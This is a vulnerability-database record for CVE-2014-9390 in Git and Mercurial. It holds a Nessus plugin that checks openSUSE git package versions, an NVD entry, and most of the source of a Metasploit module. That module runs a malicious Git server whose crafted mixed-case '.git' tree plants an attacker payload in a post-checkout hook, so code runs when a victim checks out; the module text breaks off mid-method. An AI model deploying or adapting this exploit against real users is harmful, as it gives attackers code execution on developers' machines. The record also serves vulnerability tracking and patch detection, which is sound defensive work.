{"id": "OPENSUSE-2015-80.NASL", "bulletinFamily": "scanner", "title": "openSUSE Security Update : git (openSUSE-SU-2015:0159-1)", "description": "This update fixes the following security issue :\n\n - CVE-2014-9390: arbitrary command execution vulnerability\n on case-insensitive file system ( bnc#910756)", "published": "2015-01-29T00:00:00", "modified": "2015-01-29T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/81064", "reporter": "This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://lists.opensuse.org/opensuse-updates/2015-01/msg00083.html", "https://bugzilla.opensuse.org/show_bug.cgi?id=910756"], "cvelist": ["CVE-2014-9390"], "type": "nessus", "lastseen": "2020-06-05T11:12:28", "edition": 13, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-9390"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/GIT_CLIENT_COMMAND_EXEC", "MSF:EXPLOIT/MULTI/HTTP/GIT_CLIENT_COMMAND_EXEC/"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:129784"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32120", "SECURITYVULNS:VULN:14154", "SECURITYVULNS:DOC:31505"]}, {"type": "ubuntu", "idList": ["USN-2470-1"]}, {"type": "seebug", "idList": ["SSV:91042"]}, {"type": "openvas", "idList": ["OPENVAS:703257", "OPENVAS:1361412562310868829", "OPENVAS:1361412562310703257", "OPENVAS:1361412562310130059", "OPENVAS:1361412562310121412", "OPENVAS:1361412562310842045", "OPENVAS:1361412562310868647"]}, {"type": "freebsd", "idList": ["1D567278-87A5-11E4-879C-000C292EE6B8"]}, {"type": "gentoo", "idList": ["GLSA-201612-19", "GLSA-201509-06"]}, {"type": "fedora", "idList": ["FEDORA:4F11F60CEEC6", "FEDORA:38F0860CEEC1"]}, {"type": "nessus", "idList": ["FEDORA_2014-17341.NASL", "MACOSX_XCODE_GIT.NASL", "SMB_VISUAL_STUDIO_GIT.NASL", "SUSE_SU-2015-0100-1.NASL", "MANDRIVA_MDVSA-2015-169.NASL", "UBUNTU_USN-2470-1.NASL", "GENTOO_GLSA-201509-06.NASL", "GITHUB_WIN_RCE.NASL", "OPENSUSE-2015-288.NASL", "FREEBSD_PKG_1D56727887A511E4879C000C292EE6B8.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3257-1:168E5", "DEBIAN:DLA-237-1:BBA66"]}, {"type": "oraclelinux", "idList": ["ELSA-2015-2515"]}], "modified": "2020-06-05T11:12:28", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2020-06-05T11:12:28", "rev": 2}, "vulnersScore": 7.2}, "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-80.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81064);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2014-9390\");\n\n script_name(english:\"openSUSE Security Update : git (openSUSE-SU-2015:0159-1)\");\n script_summary(english:\"Check for the openSUSE-2015-80 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security issue :\n\n - CVE-2014-9390: arbitrary command execution vulnerability\n on case-insensitive file system ( bnc#910756)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=910756\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2015-01/msg00083.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-arch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-remote-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-svn-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:git-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"git-1.8.4.5-3.8.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"git-arch-1.8.4.5-3.8.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"git-core-1.8.4.5-3.8.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"git-core-debuginfo-1.8.4.5-3.8.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"git-cvs-1.8.4.5-3.8.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"git-daemon-1.8.4.5-3.8.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"git-daemon-debuginfo-1.8.4.5-3.8.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"git-debugsource-1.8.4.5-3.8.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"git-email-1.8.4.5-3.8.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"git-gui-1.8.4.5-3.8.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"git-remote-helpers-1.8.4.5-3.8.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"git-svn-1.8.4.5-3.8.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"git-svn-debuginfo-1.8.4.5-3.8.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"git-web-1.8.4.5-3.8.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"gitk-1.8.4.5-3.8.4\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"git-2.1.4-9.7\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"git-arch-2.1.4-9.7\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"git-core-2.1.4-9.7\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"git-core-debuginfo-2.1.4-9.7\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"git-cvs-2.1.4-9.7\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"git-daemon-2.1.4-9.7\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"git-daemon-debuginfo-2.1.4-9.7\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"git-debugsource-2.1.4-9.7\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"git-email-2.1.4-9.7\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"git-gui-2.1.4-9.7\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"git-svn-2.1.4-9.7\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"git-svn-debuginfo-2.1.4-9.7\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"git-web-2.1.4-9.7\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"gitk-2.1.4-9.7\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"git-2.1.4-9.6\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"git-arch-2.1.4-9.6\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"git-core-2.1.4-9.6\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"git-core-debuginfo-2.1.4-9.6\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"git-cvs-2.1.4-9.6\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"git-daemon-2.1.4-9.6\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"git-daemon-debuginfo-2.1.4-9.6\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"git-debugsource-2.1.4-9.6\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"git-email-2.1.4-9.6\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"git-gui-2.1.4-9.6\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"git-svn-2.1.4-9.6\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"git-svn-debuginfo-2.1.4-9.6\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"git-web-2.1.4-9.6\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"gitk-2.1.4-9.6\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git / git-arch / git-core / git-core-debuginfo / git-cvs / etc\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "81064", "cpe": ["p-cpe:/a:novell:opensuse:git-gui", "p-cpe:/a:novell:opensuse:git-daemon-debuginfo", "p-cpe:/a:novell:opensuse:git-svn", "p-cpe:/a:novell:opensuse:git", "p-cpe:/a:novell:opensuse:git-cvs", "p-cpe:/a:novell:opensuse:git-web", "p-cpe:/a:novell:opensuse:git-arch", "p-cpe:/a:novell:opensuse:gitk", "p-cpe:/a:novell:opensuse:git-svn-debuginfo", "p-cpe:/a:novell:opensuse:git-core-debuginfo", "p-cpe:/a:novell:opensuse:git-email", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:git-daemon", "p-cpe:/a:novell:opensuse:git-remote-helpers", "p-cpe:/a:novell:opensuse:git-core", "cpe:/o:novell:opensuse:13.1", "p-cpe:/a:novell:opensuse:git-debugsource"], "scheme": null, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}

{"cve": [{"lastseen": "2020-12-09T19:58:29", "description": "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T02:15:00", "title": "CVE-2014-9390", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9390"], "modified": "2020-09-09T18:15:00", "cpe": ["cpe:/a:apple:xcode:6.1.1", "cpe:/a:libgit2:libgit2:-", "cpe:/a:apple:xcode:6.2", "cpe:/a:eclipse:jgit:-", "cpe:/a:eclipse:egit:-"], "id": "CVE-2014-9390", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9390", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:xcode:6.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:eclipse:egit:-:*:*:*:*:*:*:*", "cpe:2.3:a:libgit2:libgit2:-:*:*:*:*:*:*:*", "cpe:2.3:a:eclipse:jgit:-:*:*:*:*:*:*:*", "cpe:2.3:a:apple:xcode:6.2:-:*:*:*:*:*:*", "cpe:2.3:a:apple:xcode:6.2:beta_2:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2020-10-07T23:04:28", "description": "This module exploits CVE-2014-9390, which affects Git (versions less than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions less than 3.2.3) and describes three vulnerabilities. On operating systems which have case-insensitive file systems, like Windows and OS X, Git clients can be convinced to retrieve and overwrite sensitive configuration files in the .git directory which can allow arbitrary code execution if a vulnerable client can be convinced to perform certain actions (for example, a checkout) against a malicious Git repository. A second vulnerability with similar characteristics also exists in both Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where certain Unicode codepoints are ignorable. The third vulnerability with similar characteristics only affects Mercurial clients on Windows, where Windows \"short names\" (MS-DOS-compatible 8.3 format) are supported. Today this module only truly supports the first vulnerability (Git clients on case-insensitive file systems) but has the functionality to support the remaining two with a little work.\n", "published": "2015-01-01T19:03:17", "type": "metasploit", "title": "Malicious Git and Mercurial HTTP Server For CVE-2014-9390", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-9390"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/MULTI/HTTP/GIT_CLIENT_COMMAND_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::Git\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(update_info(\n info,\n 'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390',\n 'Description' => %q(\n This module exploits CVE-2014-9390, which affects Git (versions less\n than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions\n less than 3.2.3) and describes three vulnerabilities.\n\n On operating systems which have case-insensitive file systems, like\n Windows and OS X, Git clients can be convinced to retrieve and\n overwrite sensitive configuration files in the .git\n directory which can allow arbitrary code execution if a vulnerable\n client can be convinced to perform certain actions (for example,\n a checkout) against a malicious Git repository.\n\n A second vulnerability with similar characteristics also exists in both\n Git and Mercurial clients, on HFS+ file systems (Mac OS X) only, where\n certain Unicode codepoints are ignorable.\n\n The third vulnerability with similar characteristics only affects\n Mercurial clients on Windows, where Windows \"short names\"\n (MS-DOS-compatible 8.3 format) are supported.\n\n Today this module only truly supports the first vulnerability (Git\n clients on case-insensitive file systems) but has the functionality to\n support the remaining two with a little work.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2014-9390'],\n ['URL', 'https://blog.rapid7.com/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'],\n ['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'],\n ['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'],\n ['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'],\n ['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'],\n ['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'],\n ['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'],\n ['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a']\n\n ],\n 'DisclosureDate' => '2014-12-18',\n 'Targets' =>\n [\n [\n 'Automatic',\n {\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'PayloadType' => 'cmd cmd_bash',\n 'RequiredCmd' => 'generic bash-tcp perl'\n }\n }\n }\n ],\n [\n 'Windows Powershell',\n {\n 'Platform' => [ 'windows' ],\n 'Arch' => [ARCH_X86, ARCH_X64]\n }\n ]\n ],\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('GIT', [true, 'Exploit Git clients', true])\n ]\n )\n\n register_advanced_options(\n [\n OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),\n OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']),\n OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']),\n OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']),\n OptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial support', false])\n ]\n )\n end\n\n def setup\n # the exploit requires that we act enough like a real Mercurial HTTP instance,\n # so we keep a mapping of all of the files and the corresponding data we'll\n # send back along with a trigger file that signifies that the git/mercurial\n # client has fetched the malicious content.\n @repo_data = {\n git: { files: {}, trigger: nil },\n mercurial: { files: {}, trigger: nil }\n }\n\n unless datastore['GIT'] || datastore['MERCURIAL']\n fail_with(Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL')\n end\n\n setup_git\n setup_mercurial\n\n super\n end\n\n def setup_git\n return unless datastore['GIT']\n # URI must start with a /\n unless git_uri && git_uri =~ /^\\//\n fail_with(Failure::BadConfig, 'GIT_URI must start with a /')\n end\n # sanity check the malicious hook:\n if datastore['GIT_HOOK'].blank?\n fail_with(Failure::BadConfig, 'GIT_HOOK must not be blank')\n end\n\n # In .git/hooks/ directory, specially named files are shell scripts that\n # are executed when particular events occur. For example, if\n # .git/hooks/post-checkout was an executable shell script, a git client\n # would execute that file every time anything is checked out. There are\n # various other files that can be used to achieve similar goals but related\n # to committing, updating, etc.\n #\n # This vulnerability allows a specially crafted file to bypass Git's\n # blacklist and overwrite the sensitive .git/hooks/ files which can allow\n # arbitrary code execution if a vulnerable Git client can be convinced to\n # interact with a malicious Git repository.\n #\n # This builds a fake git repository using the knowledge from:\n #\n # http://schacon.github.io/gitbook/7_how_git_stores_objects.html\n # http://schacon.github.io/gitbook/7_browsing_git_objects.html\n case target.name\n when 'Automatic'\n full_cmd = \"#!/bin/sh\\n#{payload.encoded}\\n\"\n when 'Windows Powershell'\n psh = cmd_psh_payload(payload.encoded,\n payload_instance.arch.first,\n remove_comspec: true,\n encode_final_payload: true)\n full_cmd = \"#!/bin/sh\\n#{psh}\"\n end\n\n sha1, content = build_object('blob', full_cmd)\n trigger = \"/objects/#{get_path(sha1)}\"\n @repo_data[:git][:trigger] = trigger\n @repo_data[:git][:files][trigger] = content\n # build tree that points to the blob\n sha1, content = build_object('tree', \"100755 #{datastore['GIT_HOOK']}\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build a tree that points to the hooks directory in which the hook lives, called hooks\n sha1, content = build_object('tree', \"40000 hooks\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build a tree that points to the partially uppercased .git directory in\n # which hooks live\n variants = []\n %w(g G). each do |g|\n %w(i I).each do |i|\n %w(t T).each do |t|\n git = g + i + t\n variants << git unless git.chars.none? { |c| c == c.upcase }\n end\n end\n end\n git_dir = '.' + variants.sample\n sha1, content = build_object('tree', \"40000 #{git_dir}\\0#{[sha1].pack('H*')}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n\n if datastore['VERBOSE']\n vprint_status(\"Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:\")\n commit.each_line { |l| vprint_status(l.strip) }\n end\n sha1, content = build_object('commit', \"tree #{sha1}\\n#{fake_commit_message}\")\n @repo_data[:git][:files][\"/objects/#{get_path(sha1)}\"] = content\n # build HEAD\n @repo_data[:git][:files]['/HEAD'] = \"ref: refs/heads/master\\n\"\n # lastly, build refs\n @repo_data[:git][:files]['/info/refs'] = \"#{sha1}\\trefs/heads/master\\n\"\n end\n\n def setup_mercurial\n return unless datastore['MERCURIAL']\n # URI must start with a /\n unless mercurial_uri && mercurial_uri =~ /^\\//\n fail_with(Failure::BadConfig, 'MERCURIAL_URI must start with a /')\n end\n # sanity check the malicious hook\n if datastore['MERCURIAL_HOOK'].blank?\n fail_with(Failure::BadConfig, 'MERCURIAL_HOOK must not be blank')\n end\n # we fake the Mercurial HTTP protocol such that we are compliant as possible but\n # also as simple as possible so that we don't have to support all of the protocol\n # complexities. Taken from:\n # http://mercurial.selenic.com/wiki/HttpCommandProtocol\n # http://selenic.com/hg/file/tip/mercurial/wireproto.py\n @repo_data[:mercurial][:files]['?cmd=capabilities'] = 'heads getbundle=HG10UN'\n fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814'\n @repo_data[:mercurial][:files]['?cmd=heads'] = \"#{fake_sha1}\\n\"\n # TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat\n @repo_data[:mercurial][:files][\"?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}\"] = Zlib::Deflate.deflate(\"HG10UNfoofoofoo\")\n\n # TODO: finish building the fake repository\n end\n\n def exploit\n super\n end\n\n def primer\n # add the git and mercurial URIs as necessary\n if datastore['GIT']\n hardcoded_uripath(git_uri)\n print_status(\"Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}\")\n end\n if datastore['MERCURIAL']\n hardcoded_uripath(mercurial_uri)\n print_status(\"Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}\")\n end\n end\n\n # handles routing any request to the mock git, mercurial or simple HTML as necessary\n def on_request_uri(cli, req)\n # if the URI is one of our repositories and the user-agent is that of git/mercurial\n # send back the appropriate data, otherwise just show the HTML version\n if (user_agent = req.headers['User-Agent'])\n if datastore['GIT'] && user_agent =~ /^git\\// && req.uri.start_with?(git_uri)\n do_git(cli, req)\n return\n elsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\\// && req.uri.start_with?(mercurial_uri)\n do_mercurial(cli, req)\n return\n end\n end\n\n do_html(cli, req)\n end\n\n # simulates a Git HTTP server\n def do_git(cli, req)\n # determine if the requested file is something we know how to serve from our\n # fake repository and send it if so\n req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')\n if @repo_data[:git][:files].key?(req_file)\n vprint_status(\"Sending Git #{req_file}\")\n send_response(cli, @repo_data[:git][:files][req_file])\n if req_file == @repo_data[:git][:trigger]\n vprint_status(\"Trigger!\")\n # Do we need this? If so, how can I update the payload which is in a file which\n # has already been built?\n # regenerate_payload\n handler(cli)\n end\n else\n vprint_status(\"Git #{req_file} doesn't exist\")\n send_not_found(cli)\n end\n end\n\n # simulates an HTTP server with simple HTML content that lists the fake\n # repositories available for cloning\n def do_html(cli, _req)\n resp = create_response\n resp.body = <<HTML\n <html>\n <head><title>Public Repositories</title></head>\n <body>\n <p>Here are our public repositories:</p>\n <ul>\nHTML\n\n if datastore['GIT']\n this_git_uri = URI.parse(get_uri).merge(git_uri)\n resp.body << \"<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>\"\n else\n resp.body << \"<li><a>Git</a> (currently offline)</li>\"\n end\n\n if datastore['MERCURIAL']\n this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)\n resp.body << \"<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>\"\n else\n resp.body << \"<li><a>Mercurial</a> (currently offline)</li>\"\n end\n resp.body << <<HTML\n </ul>\n </body>\n </html>\nHTML\n\n cli.send_response(resp)\n end\n\n # simulates a Mercurial HTTP server\n def do_mercurial(cli, req)\n # determine if the requested file is something we know how to serve from our\n # fake repository and send it if so\n uri = URI.parse(req.uri)\n req_path = uri.path\n req_path += \"?#{uri.query}\" if uri.query\n req_path.gsub!(/^#{mercurial_uri}/, '')\n if @repo_data[:mercurial][:files].key?(req_path)\n vprint_status(\"Sending Mercurial #{req_path}\")\n send_response(cli, @repo_data[:mercurial][:files][req_path], 'Content-Type' => 'application/mercurial-0.1')\n if req_path == @repo_data[:mercurial][:trigger]\n vprint_status(\"Trigger!\")\n # Do we need this? If so, how can I update the payload which is in a file which\n # has already been built?\n # regenerate_payload\n handler(cli)\n end\n else\n vprint_status(\"Mercurial #{req_path} doesn't exist\")\n send_not_found(cli)\n end\n end\n\n # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI\n def git_uri\n return @git_uri if @git_uri\n if datastore['GIT_URI'].blank?\n @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git'\n else\n @git_uri = datastore['GIT_URI']\n end\n end\n\n # Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI\n def mercurial_uri\n return @mercurial_uri if @mercurial_uri\n if datastore['MERCURIAL_URI'].blank?\n @mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase\n else\n @mercurial_uri = datastore['MERCURIAL_URI']\n 